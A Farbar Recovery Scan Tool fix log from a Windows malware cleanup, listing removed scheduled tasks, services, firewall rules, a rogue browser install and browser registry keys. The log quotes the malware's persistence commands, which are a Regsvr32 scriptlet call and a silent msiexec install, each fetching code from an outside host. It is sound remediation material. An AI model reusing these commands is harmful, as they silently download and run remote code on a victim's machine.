Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2017 Ran by fundowic (13-05-2017 18:14:31) Run:1 Running from C:\Users\fundowic\Desktop\FRST Loaded Profiles: fundowic (Available Profiles: fundowic) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: Task: {E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== scrobj.dll C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{A334B4CB-70C2-40AE-AC60-82462738B5FA}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{3A44F400-C937-46F0-8F78-609CA667F38A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\fundowic\AppData\Local\Bagsarah HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q GroupPolicy: Restriction <======= ATTENTION R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed] C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll U3 mfeavfk01; no ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\fundowic\AppData\Local\Google DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\fundowic\AppData\Local\Mozilla C:\Users\fundowic\AppData\Roaming\Mozilla C:\Users\fundowic\AppData\Roaming\Profiles CMD: netsh winsock reset EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} => key removed successfully C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => moved successfully C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => moved successfully C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A334B4CB-70C2-40AE-AC60-82462738B5FA} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3A44F400-C937-46F0-8F78-609CA667F38A} => value removed successfully "C:\Program Files (x86)\Bagsarah" => removed successfully. "C:\Users\fundowic\AppData\Local\Bagsarah" => removed successfully. HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully HKLM\System\CurrentControlSet\Services\OneDirveSrv => key removed successfully OneDirveSrv => service removed successfully C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll => moved successfully HKLM\System\CurrentControlSet\Services\mfeavfk01 => key removed successfully mfeavfk01 => service removed successfully HKLM\System\CurrentControlSet\Services\VGPU => key removed successfully VGPU => service removed successfully C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk => moved successfully C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk => moved successfully HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => key removed successfully HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => key not found. HKCU\Software\Google => key not found. HKLM\SOFTWARE\Google => key removed successfully HKLM\SOFTWARE\Wow6432Node\Google => key removed successfully C:\Program Files (x86)\Google => moved successfully "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" => not found. C:\Users\fundowic\AppData\Local\Google => moved successfully HKCU\Software\Mozilla => key not found. HKCU\Software\MozillaPlugins => key not found. HKLM\SOFTWARE\Mozilla => key removed successfully HKLM\SOFTWARE\MozillaPlugins => key removed successfully HKLM\SOFTWARE\Wow6432Node\Mozilla => key removed successfully HKLM\SOFTWARE\Wow6432Node\mozilla.org => key not found. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => key removed successfully "C:\Users\fundowic\AppData\Local\Mozilla" => not found. C:\Users\fundowic\AppData\Roaming\Mozilla => moved successfully "C:\Users\fundowic\AppData\Roaming\Profiles" => not found. ========= netsh winsock reset ========= Sucessfully reset the Winsock Catalog. You must restart the computer in order to complete the reset. ========= End of CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23574949 B Java, Flash, Steam htmlcache => 492 B Windows/system/drivers => 469755972 B Edge => 0 B Chrome => 0 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 81460045 B Public => 0 B ProgramData => 0 B systemprofile => 67018 B systemprofile32 => 66088 B LocalService => 0 B NetworkService => 3630 B fundowic => 614602485 B sys_augustyn => 305132294 B RecycleBin => 0 B EmptyTemp: => 1.4 GB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 18:15:44 ====